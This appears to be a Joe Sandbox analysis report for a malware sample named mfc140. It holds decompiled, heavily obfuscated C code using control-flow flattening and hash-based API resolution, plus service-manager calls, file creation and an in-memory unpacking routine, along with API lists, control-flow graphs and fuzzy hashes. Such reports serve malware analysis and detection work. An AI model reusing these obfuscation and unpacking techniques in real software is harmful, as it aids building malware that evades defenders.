                                                        							if(_t92 == 0) {
                                                        								_t28 = 0x23c48583;
                                                        							} else {
                                                        								_t50 =  *0x3ee54c; // 0x5ce728
                                                        								 *((intOrPtr*)(_t50 + 0x220)) = _t94;
                                                        								_t28 = 0xc471eb;
                                                        							}
                                                        							continue;
                                                        						} else {
                                                        							_t98 = _t28 - 0x9835f84;
                                                        							if(_t98 > 0) {
                                                        								__eflags = _t28 - 0xc0f0991;
                                                        								if(_t28 != 0xc0f0991) {
                                                        									goto L36;
                                                        								} else {
                                                        									_t69 =  *0x3edbd8;
                                                        									__eflags = _t69;
                                                        									if(_t69 == 0) {
                                                        										_t69 = E003E3E60(_t64, E003E3F00(0xd9518805), 0x141622d6, _t94);
                                                        										 *0x3edbd8 = _t69;
                                                        									}
                                                        									_t53 =  *0x3ee54c; // 0x5ce728
                                                        									_t56 =  *_t69(0, _v528, 0, 0, _t53 + 0x18); // executed
                                                        									__eflags = _t56;
                                                        									_t28 = 0x9835f84;
                                                        									_t64 =  ==  ? _t94 : _t64;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t98 == 0) {
                                                        									E003E7C60(_t94);
                                                        									_t28 = 0x6addd5c;
                                                        									continue;
                                                        								} else {
                                                        									if(_t28 == 0xc471eb) {
                                                        										_v528 = 0xc1a3;
                                                        										_t28 = 0x179ed98e;
                                                        										_v528 = _v528 + 0xffff1ad7;
                                                        										_v528 = _v528 ^ 0xffffdc53;
                                                        										continue;
                                                        									} else {
                                                        										if(_t28 != 0x6addd5c) {
                                                        											goto L36;
                                                        										} else {
                                                        											_t60 =  *0x3ee3f4;
                                                        											if(_t60 == 0) {
                                                        												_t60 = E003E3E60(_t64, E003E3F00(0x9bab0b12), 0x7dc9b9bb, _t94);
                                                        												 *0x3ee3f4 = _t60;
                                                        											}
                                                        											 *_t60(0,  &_v524, 0x104);
                                                        											_t62 = E003E3D00( &_v536);
                                                        											_t72 =  *0x3ee54c; // 0x5ce728
                                                        											 *((intOrPtr*)(_t72 + 0x46c)) = _t62;
                                                        											_t28 = 0x39ea8110;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L42:
                                                        					}
                                                        					__eflags = _t28 - 0x29f9e503;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t28 - 0x39ea8110;
                                                        						if(_t28 == 0x39ea8110) {
                                                        							_t29 =  *0x3edbd8;
                                                        							__eflags = _t29;
                                                        							if(_t29 == 0) {
                                                        								_t29 = E003E3E60(_t64, E003E3F00(0xd9518805), 0x141622d6, _t94);
                                                        								 *0x3edbd8 = _t29;
                                                        							}
                                                        							 *_t29(0, 0x25, 0, 0,  &_v524);
                                                        							_t31 =  *0x3ee54c; // 0x5ce728
                                                        							_t32 = _t31 + 0x234;
                                                        							__eflags = _t31 + 0x234;
                                                        							E003E3040(_t32);
                                                        							goto L41;
                                                        						} else {
                                                        							goto L36;
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							_t37 =  *0x3ee494;
                                                        							__eflags = _t37;
                                                        							if(_t37 == 0) {
                                                        								_t37 = E003E3E60(_t64, E003E3F00(0x9bab0b12), 0x7facde30, _t94);
                                                        								 *0x3ee494 = _t37;
                                                        							}
                                                        							_t93 =  *_t37();
                                                        							_t39 =  *0x3edd18;
                                                        							__eflags = _t39;
                                                        							if(_t39 == 0) {
                                                        								_t39 = E003E3E60(_t64, E003E3F00(0x9bab0b12), 0x9ff0609c, _t94);
                                                        								 *0x3edd18 = _t39;
                                                        							}
                                                        							_t40 =  *_t39(_t93, 8, 0x480);
                                                        							 *0x3ee54c = _t40;
                                                        							__eflags = _t40;
                                                        							if(_t40 == 0) {
                                                        								L41:
                                                        								return _t64;
                                                        							} else {
                                                        								 *((intOrPtr*)(_t40 + 4)) = E003E7E40;
                                                        								_t28 = 0x13fee53b;
                                                        								goto L1;
                                                        							}
                                                        						} else {
                                                        							__eflags = _t28 - 0x179ed98e;
                                                        							if(_t28 == 0x179ed98e) {
                                                        								__eflags =  *0x3ee18c;
                                                        								if( *0x3ee18c == 0) {
                                                        									 *0x3ee18c = E003E3E60(_t64, E003E3F00(0x26f5757c), 0x268fe5f0, _t94);
                                                        								}
                                                        								CloseServiceHandle(_t92); // executed
                                                        								_t28 = 0xc0f0991;
                                                        								goto L1;
                                                        							} else {
                                                        								__eflags = _t28 - 0x23c48583;
                                                        								if(_t28 != 0x23c48583) {
                                                        									goto L36;
                                                        								} else {
                                                        									_v528 = 0x5332;
                                                        									_v528 = _v528 << 6;
                                                        									_v528 = _v528 >> 0xf;
                                                        									_v528 = _v528 + 0xffffb18f;
                                                        									_v528 = _v528 >> 3;
                                                        									_v528 = _v528 ^ 0x1ffff62b;
                                                        									_t47 =  *0x3ee54c; // 0x5ce728
                                                        									 *((intOrPtr*)(_t47 + 8)) = 0x3e7e30;
                                                        									_t28 = 0xc0f0991;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L42;
                                                        					L36:
                                                        					__eflags = _t28 - 0x305b3459;
                                                        				} while (_t28 != 0x305b3459);
                                                        				return _t64;
                                                        				goto L42;
                                                        			}






























                                                        0x003e9868
                                                        0x003e986a
                                                        0x003e9871
                                                        0x003e9875
                                                        0x003e9875
                                                        0x003e9878
                                                        0x003e9880
                                                        0x003e9880
                                                        0x003e9880
                                                        0x003e9880
                                                        0x003e9885
                                                        0x00000000
                                                        0x00000000
                                                        0x003e988b
                                                        0x003e9993
                                                        0x003e9995
                                                        0x003e99ad
                                                        0x003e99ad
                                                        0x003e99bb
                                                        0x003e99bd
                                                        0x003e99bf
                                                        0x003e99c1
                                                        0x003e99d8
                                                        0x003e99c3
                                                        0x003e99c3
                                                        0x003e99c8
                                                        0x003e99ce
                                                        0x003e99ce
                                                        0x00000000
                                                        0x003e9891
                                                        0x003e9891
                                                        0x003e9896
                                                        0x003e9936
                                                        0x003e993b
                                                        0x00000000
                                                        0x003e9941
                                                        0x003e9941
                                                        0x003e9947
                                                        0x003e9949
                                                        0x003e9961
                                                        0x003e9963
                                                        0x003e9963
                                                        0x003e9969
                                                        0x003e997d
                                                        0x003e997f
                                                        0x003e9981
                                                        0x003e9986
                                                        0x00000000
                                                        0x003e9986
                                                        0x003e989c
                                                        0x003e989c
                                                        0x003e9927
                                                        0x003e992c
                                                        0x00000000
                                                        0x003e98a2
                                                        0x003e98a7
                                                        0x003e9905
                                                        0x003e990d
                                                        0x003e9912
                                                        0x003e991a
                                                        0x00000000
                                                        0x003e98a9
                                                        0x003e98ae
                                                        0x00000000
                                                        0x003e98b4
                                                        0x003e98b4
                                                        0x003e98bb
                                                        0x003e98ce
                                                        0x003e98d3
                                                        0x003e98d3
                                                        0x003e98e4
                                                        0x003e98ea
                                                        0x003e98ef
                                                        0x003e98f5
                                                        0x003e98fb
                                                        0x00000000
                                                        0x003e98fb
                                                        0x003e98ae
                                                        0x003e98a7
                                                        0x003e989c
                                                        0x003e9896
                                                        0x00000000
                                                        0x003e988b
                                                        0x003e99e2
                                                        0x003e99e7
                                                        0x003e9ae3
                                                        0x003e9ae8
                                                        0x003e9b02
                                                        0x003e9b07
                                                        0x003e9b09
                                                        0x003e9b1c
                                                        0x003e9b21
                                                        0x003e9b21
                                                        0x003e9b33
                                                        0x003e9b35
                                                        0x003e9b3e
                                                        0x003e9b3e
                                                        0x003e9b44
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x003e99ed
                                                        0x003e99ed
                                                        0x003e9a73
                                                        0x003e9a78
                                                        0x003e9a7a
                                                        0x003e9a8d
                                                        0x003e9a92
                                                        0x003e9a92
                                                        0x003e9a99
                                                        0x003e9a9b
                                                        0x003e9aa0
                                                        0x003e9aa2
                                                        0x003e9ab5
                                                        0x003e9aba
                                                        0x003e9aba
                                                        0x003e9ac7
                                                        0x003e9ac9
                                                        0x003e9ace
                                                        0x003e9ad0
                                                        0x003e9b4f
                                                        0x003e9b58
                                                        0x003e9ad2
                                                        0x003e9ad2
                                                        0x003e9ad9
                                                        0x00000000
                                                        0x003e9ad9
                                                        0x003e99f3
                                                        0x003e99f3
                                                        0x003e99f8
                                                        0x003e9a47
                                                        0x003e9a49
                                                        0x003e9a61
                                                        0x003e9a61
                                                        0x003e9a67
                                                        0x003e9a69
                                                        0x00000000
                                                        0x003e99fa
                                                        0x003e99fa
                                                        0x003e99ff
                                                        0x00000000
                                                        0x003e9a05
                                                        0x003e9a05
                                                        0x003e9a0d
                                                        0x003e9a12
                                                        0x003e9a17
                                                        0x003e9a1f
                                                        0x003e9a24
                                                        0x003e9a2c
                                                        0x003e9a31
                                                        0x003e9a38
                                                        0x00000000
                                                        0x003e9a38
                                                        0x003e99ff
                                                        0x003e99f8
                                                        0x003e99ed
                                                        0x00000000
                                                        0x003e9aea
                                                        0x003e9aea
                                                        0x003e9aea
                                                        0x003e9b01
                                                        0x00000000

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,005CE710), ref: 003E997D
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 003E99BB
                                                        • CloseServiceHandle.ADVAPI32(?,?,3251FEFE,?,?), ref: 003E9A67
                                                        • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?,3251FEFE,?,?), ref: 003E9B33
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279698396.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2279686443.00000000003E0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279709901.00000000003ED000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279716653.00000000003EF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_3e0000_mfc140.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FolderPath$CloseHandleManagerOpenService
                                                        • String ID: (\$2S$Y4[0
                                                        • API String ID: 2382770032-3917473840
                                                        • Opcode ID: 6e858ea845305272d0ebb7195e93f94b04f317fc2d7a3c04a5650d1a42e61613
                                                        • Instruction ID: 916a19c5f8574fb7e0b931f9e49c17a3ee4948f88f631a72d591ffa46bb52fd7
                                                        • Opcode Fuzzy Hash: 6e858ea845305272d0ebb7195e93f94b04f317fc2d7a3c04a5650d1a42e61613
                                                        • Instruction Fuzzy Hash: B361FA717042A59BD736AF6AAC857BA329DDBD0704F11066EF005DF3E1EA30CD058B92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 105 3e8400-3e84df 106 3e84e3-3e84e9 105->106 107 3e84ef 106->107 108 3e85c8-3e85ce 106->108 109 3e866c-3e86b4 call 3eb6e0 107->109 110 3e84f5-3e84fb 107->110 111 3e8630-3e8637 108->111 112 3e85d0-3e85d6 108->112 124 3e85bd-3e85c7 109->124 131 3e86ba 109->131 116 3e84fd-3e8503 110->116 117 3e854a-3e8551 110->117 114 3e8639-3e864f call 3e3f00 call 3e3e60 111->114 115 3e8654-3e8667 111->115 118 3e85d8-3e85e0 112->118 119 3e85b1-3e85b7 112->119 114->115 115->106 125 3e8505-3e850b 116->125 126 3e8543-3e8548 116->126 122 3e856e-3e8591 117->122 123 3e8553-3e8569 call 3e3f00 call 3e3e60 117->123 127 3e85e2-3e85fa call 3e3f00 call 3e3e60 118->127 128 3e8600-3e8624 CreateFileW 118->128 119->106 119->124 146 3e85ae 122->146 147 3e8593-3e85a9 call 3e3f00 call 3e3e60 122->147 123->122 125->119 129 3e8511-3e8518 125->129 126->106 127->128 128->124 132 3e8626-3e862b 128->132 136 3e851a-3e8530 call 3e3f00 call 3e3e60 129->136 137 3e8535-3e8541 129->137 140 3e86bc-3e86be 131->140 141 3e86c4-3e86d1 131->141 132->106 136->137 137->106 140->124 140->141 146->119 147->146
                                                        C-Code - Quality: 66%
                                                        			E003E8400(void* __ebx, void* __ebp) {
                                                        				short _v524;
                                                        				char _v564;
                                                        				char _v572;
                                                        				struct _SECURITY_ATTRIBUTES* _v576;
                                                        				signed int _v580;
                                                        				signed int _v584;
                                                        				signed int _v588;
                                                        				signed int _v592;
                                                        				intOrPtr _v596;
                                                        				intOrPtr* _t75;
                                                        				intOrPtr* _t82;
                                                        				intOrPtr* _t85;
                                                        				void* _t92;
                                                        				intOrPtr* _t93;
                                                        				void* _t95;
                                                        				void* _t97;
                                                        				void* _t98;
                                                        				void* _t99;
                                                        				void* _t100;
                                                        				void* _t101;
                                                        				signed int _t119;
                                                        				void* _t121;
                                                        				void* _t122;
                                                        				signed int _t123;
                                                        				intOrPtr _t124;
                                                        				void* _t126;
                                                        				void* _t129;
                                                        
                                                        				_t126 = __ebp;
                                                        				_t101 = __ebx;
                                                        				_v584 = 0xdbec;
                                                        				_v584 = _v584 + 0xa437;
                                                        				_v584 = _v584 | 0x0afcf5fb;
                                                        				_v584 = _v584 ^ 0x9493ba05;
                                                        				_v584 = _v584 >> 0xc;
                                                        				_v584 = _v584 >> 0xb;
                                                        				_v584 = _v584 ^ 0x000001bc;
                                                        				_v592 = 0x7d19;
                                                        				_v592 = _v592 << 9;
                                                        				_v592 = _v592 >> 0xe;
                                                        				_v592 = _v592 + 0xffff07e5;
                                                        				_v592 = _v592 | 0x8aea6eef;
                                                        				_v592 = _v592 + 0xd867;
                                                        				_v592 = _v592 + 0x9c41;
                                                        				_v592 = _v592 + 0x3de0;
                                                        				_v592 = _v592 + 0x218b;
                                                        				_v592 = _v592 ^ 0x00014403;
                                                        				_v588 = 0x2591;
                                                        				_t123 = 0x4a20241;
                                                        				_v588 = _v588 * 0x7d;
                                                        				_v588 = _v588 + 0x8d68;
                                                        				_v588 = _v588 + 0xffff8911;
                                                        				_v588 = _v588 * 0x6a;
                                                        				_v588 = _v588 + 0xffff93d5;
                                                        				_v588 = _v588 ^ 0x07a13cd2;
                                                        				_v580 = 0x789;
                                                        				_v580 = _v580 >> 1;
                                                        				_v580 = _v580 ^ 0xaee58af2;
                                                        				_v580 = _v580 ^ 0xaee58936;
                                                        				_t122 = _v580;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t129 = _t123 - 0x1aed34c4;
                                                        						if(_t129 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t129 == 0) {
                                                        							_v580 = 0xa8c00;
                                                        							_v576 = 0;
                                                        							_v596 = E003EB6E0(_v580, _v576, 0x989680, 0);
                                                        							_v592 = _t119;
                                                        							_t121 = _v588 - _v564;
                                                        							_t124 = _v596;
                                                        							asm("sbb ecx, [esp+0x3c]");
                                                        							__eflags = _v584 - _v592;
                                                        							if(__eflags < 0) {
                                                        								goto L16;
                                                        							} else {
                                                        								if(__eflags > 0) {
                                                        									L29:
                                                        									return 1;
                                                        								} else {
                                                        									__eflags = _t121 - _t124;
                                                        									if(_t121 < _t124) {
                                                        										goto L16;
                                                        									} else {
                                                        										goto L29;
                                                        									}
                                                        								}
                                                        							}
                                                        						} else {
                                                        							if(_t123 == 0x12f5064) {
                                                        								_t82 =  *0x3edec0;
                                                        								__eflags = _t82;
                                                        								if(_t82 == 0) {
                                                        									_t99 = E003E3F00(0x9bab0b12);
                                                        									_t119 = 0x8b0c7279;
                                                        									_t82 = E003E3E60(_t101, _t99, 0x8b0c7279, _t126);
                                                        									 *0x3edec0 = _t82;
                                                        								}
                                                        								 *_t82(_t122, 0,  &_v564, 0x28);
                                                        								asm("sbb esi, esi");
                                                        								_t85 =  *0x3ede3c;
                                                        								_t123 = (_t123 & 0xf96a5287) + 0x13ef6fdf;
                                                        								__eflags = _t85;
                                                        								if(_t85 == 0) {
                                                        									_t98 = E003E3F00(0x9bab0b12);
                                                        									_t119 = 0x20de7595;
                                                        									_t85 = E003E3E60(_t101, _t98, 0x20de7595, _t126);
                                                        									 *0x3ede3c = _t85;
                                                        								}
                                                        								 *_t85(_t122);
                                                        								goto L15;
                                                        							} else {
                                                        								if(_t123 == 0x4a20241) {
                                                        									_t123 = 0x33602029;
                                                        									continue;
                                                        								} else {
                                                        									if(_t123 != 0xd59c266) {
                                                        										goto L15;
                                                        									} else {
                                                        										_t93 =  *0x3ee1d4;
                                                        										if(_t93 == 0) {
                                                        											_t97 = E003E3F00(0x9bab0b12);
                                                        											_t119 = 0xa229df38;
                                                        											_t93 = E003E3E60(_t101, _t97, 0xa229df38, _t126);
                                                        											 *0x3ee1d4 = _t93;
                                                        										}
                                                        										 *_t93( &_v572);
                                                        										_t123 = 0x1aed34c4;
                                                        										continue;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L30:
                                                        					}
                                                        					__eflags = _t123 - 0x33602029;
                                                        					if(_t123 == 0x33602029) {
                                                        						_t75 =  *0x3ee3f4;
                                                        						__eflags = _t75;
                                                        						if(_t75 == 0) {
                                                        							_t100 = E003E3F00(0x9bab0b12);
                                                        							_t119 = 0x7dc9b9bb;
                                                        							_t75 = E003E3E60(_t101, _t100, 0x7dc9b9bb, _t126);
                                                        							 *0x3ee3f4 = _t75;
                                                        						}
                                                        						 *_t75(0,  &_v524, 0x104);
                                                        						_t123 = 0x3ae77736;
                                                        						goto L1;
                                                        					} else {
                                                        						__eflags = _t123 - 0x3ae77736;
                                                        						if(_t123 != 0x3ae77736) {
                                                        							goto L15;
                                                        						} else {
                                                        							__eflags =  *0x3ede04;
                                                        							if( *0x3ede04 == 0) {
                                                        								_t95 = E003E3F00(0x9bab0b12);
                                                        								_t119 = 0xb66d748a;
                                                        								 *0x3ede04 = E003E3E60(_t101, _t95, 0xb66d748a, _t126);
                                                        							}
                                                        							_t92 = CreateFileW( &_v524, _v584, _v592, 0, _v588, _v580, 0); // executed
                                                        							_t122 = _t92;
                                                        							__eflags = _t122 - 0xffffffff;
                                                        							if(_t122 == 0xffffffff) {
                                                        								break;
                                                        							} else {
                                                        								_t123 = 0x12f5064;
                                                        								goto L1;
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L30;
                                                        					L15:
                                                        					__eflags = _t123 - 0x13ef6fdf;
                                                        				} while (_t123 != 0x13ef6fdf);
                                                        				L16:
                                                        				__eflags = 0;
                                                        				return 0;
                                                        				goto L30;
                                                        			}






























                                                        0x003e8400
                                                        0x003e8400
                                                        0x003e8406
                                                        0x003e840e
                                                        0x003e8416
                                                        0x003e841e
                                                        0x003e8426
                                                        0x003e842b
                                                        0x003e8430
                                                        0x003e8438
                                                        0x003e8440
                                                        0x003e8445
                                                        0x003e844a
                                                        0x003e8452
                                                        0x003e845a
                                                        0x003e8462
                                                        0x003e846a
                                                        0x003e8472
                                                        0x003e847a
                                                        0x003e8482
                                                        0x003e8491
                                                        0x003e8496
                                                        0x003e849a
                                                        0x003e84a2
                                                        0x003e84af
                                                        0x003e84b3
                                                        0x003e84bb
                                                        0x003e84c3
                                                        0x003e84cb
                                                        0x003e84cf
                                                        0x003e84d7
                                                        0x003e84df
                                                        0x003e84df
                                                        0x003e84e3
                                                        0x003e84e3
                                                        0x003e84e3
                                                        0x003e84e3
                                                        0x003e84e9
                                                        0x00000000
                                                        0x00000000
                                                        0x003e84ef
                                                        0x003e866e
                                                        0x003e8676
                                                        0x003e8696
                                                        0x003e869a
                                                        0x003e86a2
                                                        0x003e86a6
                                                        0x003e86aa
                                                        0x003e86b2
                                                        0x003e86b4
                                                        0x00000000
                                                        0x003e86ba
                                                        0x003e86ba
                                                        0x003e86c5
                                                        0x003e86d1
                                                        0x003e86bc
                                                        0x003e86bc
                                                        0x003e86be
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x003e86be
                                                        0x003e86ba
                                                        0x003e84f5
                                                        0x003e84fb
                                                        0x003e854a
                                                        0x003e854f
                                                        0x003e8551
                                                        0x003e8558
                                                        0x003e855d
                                                        0x003e8564
                                                        0x003e8569
                                                        0x003e8569
                                                        0x003e8578
                                                        0x003e857c
                                                        0x003e857e
                                                        0x003e8589
                                                        0x003e858f
                                                        0x003e8591
                                                        0x003e8598
                                                        0x003e859d
                                                        0x003e85a4
                                                        0x003e85a9
                                                        0x003e85a9
                                                        0x003e85af
                                                        0x00000000
                                                        0x003e84fd
                                                        0x003e8503
                                                        0x003e8543
                                                        0x00000000
                                                        0x003e8505
                                                        0x003e850b
                                                        0x00000000
                                                        0x003e8511
                                                        0x003e8511
                                                        0x003e8518
                                                        0x003e851f
                                                        0x003e8524
                                                        0x003e852b
                                                        0x003e8530
                                                        0x003e8530
                                                        0x003e853a
                                                        0x003e853c
                                                        0x00000000
                                                        0x003e853c
                                                        0x003e850b
                                                        0x003e8503
                                                        0x003e84fb
                                                        0x00000000
                                                        0x003e84ef
                                                        0x003e85c8
                                                        0x003e85ce
                                                        0x003e8630
                                                        0x003e8635
                                                        0x003e8637
                                                        0x003e863e
                                                        0x003e8643
                                                        0x003e864a
                                                        0x003e864f
                                                        0x003e864f
                                                        0x003e8660
                                                        0x003e8662
                                                        0x00000000
                                                        0x003e85d0
                                                        0x003e85d0
                                                        0x003e85d6
                                                        0x00000000
                                                        0x003e85d8
                                                        0x003e85de
                                                        0x003e85e0
                                                        0x003e85e7
                                                        0x003e85ec
                                                        0x003e85fa
                                                        0x003e85fa
                                                        0x003e861d
                                                        0x003e861f
                                                        0x003e8621
                                                        0x003e8624
                                                        0x00000000
                                                        0x003e8626
                                                        0x003e8626
                                                        0x00000000
                                                        0x003e8626
                                                        0x003e8624
                                                        0x003e85d6
                                                        0x00000000
                                                        0x003e85b1
                                                        0x003e85b1
                                                        0x003e85b1
                                                        0x003e85bd
                                                        0x003e85bd
                                                        0x003e85c7
                                                        0x00000000

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE), ref: 003E861D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279698396.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2279686443.00000000003E0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279709901.00000000003ED000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279716653.00000000003EF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_3e0000_mfc140.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: ) `3$) `3$6w:$6w:$=
                                                        • API String ID: 823142352-4124229693
                                                        • Opcode ID: 472e57e7293867e5bdb677b111f23773fe849972d95026ace7cdd8784f07b521
                                                        • Instruction ID: 500c7301910f722470d9a9eff2b538056911c808465b95a28d2e9b6ca39c0e20
                                                        • Opcode Fuzzy Hash: 472e57e7293867e5bdb677b111f23773fe849972d95026ace7cdd8784f07b521
                                                        • Instruction Fuzzy Hash: 93610771A083A19FC726DF6AC44966FB7E5ABD0714F008A1CF4999B2E0DB74DD058F82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 160 2d0d60-2d0dd5 call 2d0ed0 VirtualAlloc RtlMoveMemory 164 2d0ebe-2d0ec4 160->164 165 2d0ddb-2d0dde 160->165 165->164 166 2d0de4-2d0de6 165->166 166->164 167 2d0dec-2d0df0 166->167 167->164 169 2d0df6-2d0dfd 167->169 170 2d0eaf-2d0ebb 169->170 171 2d0e03-2d0e36 call 2d1140 RtlMoveMemory 169->171 171->164 175 2d0e3c-2d0e4a VirtualAlloc 171->175 176 2d0e4c-2d0e52 175->176 177 2d0e89-2d0ea0 RtlFillMemory 175->177 178 2d0e5a-2d0e68 176->178 179 2d0e54-2d0e56 176->179 177->164 182 2d0ea2-2d0ea5 177->182 178->164 181 2d0e6a-2d0e7d RtlMoveMemory 178->181 179->178 181->164 183 2d0e7f-2d0e83 181->183 182->164 184 2d0ea7-2d0ea9 182->184 183->164 185 2d0e85 183->185 184->170 184->171 185->177
                                                        APIs
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002D0F08
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002D0F3E
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002D0F7F
                                                        • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 002D0DB4
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 002D0DC3
                                                          • Part of subcall function 002D1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,002D0EFD,00000000), ref: 002D1155
                                                        • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 002D0E11
                                                        • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 002D0E3D
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 002D0E6C
                                                        • RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 002D0E98
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279660601.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_2d0000_mfc140.jbxd
                                                        Similarity
                                                        • API ID: Memory$Move$AllocVirtual$Filllstrcpyn
                                                        • String ID:
                                                        • API String ID: 3581289920-0
                                                        • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction ID: 15891d395ebeaa6218be2c9988314ed9f63d1efcc3a7231ab5eab0be654e0aec
                                                        • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction Fuzzy Hash: D531D4B1A143416BD724EB60CC84FAB77E9EBC8381F044D2EB94993361D635DCA1CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 186 3e8e80-3e8e98 187 3e8ea0-3e8ea5 186->187 188 3e8f7a-3e8f7f 187->188 189 3e8eab 187->189 190 3e8f85-3e8f8a 188->190 191 3e9011-3e9016 188->191 192 3e8f3f-3e8f46 189->192 193 3e8eb1-3e8eb6 189->193 196 3e8fce-3e8fd5 190->196 197 3e8f8c-3e8f91 190->197 191->187 194 3e8f48-3e8f5e call 3e3f00 call 3e3e60 192->194 195 3e8f63-3e8f75 192->195 198 3e8ebc-3e8ec1 193->198 199 3e901b-3e9022 193->199 194->195 195->187 201 3e8fd7-3e8fed call 3e3f00 call 3e3e60 196->201 202 3e8ff2-3e900c OpenServiceW 196->202 205 3e8fbb-3e8fc0 197->205 206 3e8f93-3e8fa3 197->206 207 3e8efc-3e8f03 198->207 208 3e8ec3-3e8ec8 198->208 203 3e903f 199->203 204 3e9024-3e903a call 3e3f00 call 3e3e60 199->204 201->202 202->187 221 3e9042-3e9049 203->221 204->203 205->187 212 3e8fc6-3e8fcd 205->212 209 3e8fae-3e8fb6 206->209 210 3e8fa5-3e8fac 206->210 215 3e8f05-3e8f1b call 3e3f00 call 3e3e60 207->215 216 3e8f20-3e8f2f 207->216 208->205 211 3e8ece-3e8ed5 208->211 209->187 210->209 210->210 219 3e8ed7-3e8eed call 3e3f00 call 3e3e60 211->219 220 3e8ef2-3e8efa 211->220 215->216 216->221 233 3e8f35-3e8f3a 216->233 219->220 220->187 233->187
                                                        C-Code - Quality: 66%
                                                        			E003E8E80() {
                                                        				short* _v4;
                                                        				void* __ebx;
                                                        				void* __ecx;
                                                        				void* __ebp;
                                                        				void* _t4;
                                                        				void* _t6;
                                                        				intOrPtr* _t11;
                                                        				intOrPtr* _t15;
                                                        				intOrPtr* _t19;
                                                        				intOrPtr* _t22;
                                                        				void* _t25;
                                                        				void* _t42;
                                                        				short* _t43;
                                                        				intOrPtr _t44;
                                                        				short* _t45;
                                                        				void* _t46;
                                                        				void* _t47;
                                                        
                                                        				_t25 = _v4;
                                                        				_t4 = 0x1779a150;
                                                        				_t46 = _v4;
                                                        				_t43 = _v4;
                                                        				_t42 = 0;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t47 = _t4 - 0xebfcc22;
                                                        						if(_t47 <= 0) {
                                                        							break;
                                                        						}
                                                        						if(_t4 == 0x1779a150) {
                                                        							_t4 = 0x23287775;
                                                        							continue;
                                                        						} else {
                                                        							if(_t4 == 0x1e3d7119) {
                                                        								if( *0x3ee270 == 0) {
                                                        									 *0x3ee270 = E003E3E60(_t25, E003E3F00(0x26f5757c), 0x56e230f9, _t46);
                                                        								}
                                                        								_t6 = OpenServiceW(_t46, _t43, 0x10000); // executed
                                                        								_t25 = _t6;
                                                        								_t4 =  !=  ? 0xebfcc22 : 0xbf6010;
                                                        								continue;
                                                        							} else {
                                                        								if(_t4 != 0x23287775) {
                                                        									goto L22;
                                                        								} else {
                                                        									_t44 =  *0x3ee54c; // 0x5ce728
                                                        									_t45 = _t44 + 0x260;
                                                        									while( *_t45 != 0x5c) {
                                                        										_t45 = _t45 + 2;
                                                        									}
                                                        									_t43 = _t45 + 2;
                                                        									_t4 = 0x10ada17;
                                                        									continue;
                                                        								}
                                                        							}
                                                        						}
                                                        						L32:
                                                        					}
                                                        					if(_t47 == 0) {
                                                        						_t11 =  *0x3ee4c8;
                                                        						if(_t11 == 0) {
                                                        							_t11 = E003E3E60(_t25, E003E3F00(0x26f5757c), 0xe9d3e51f, _t46);
                                                        							 *0x3ee4c8 = _t11;
                                                        						}
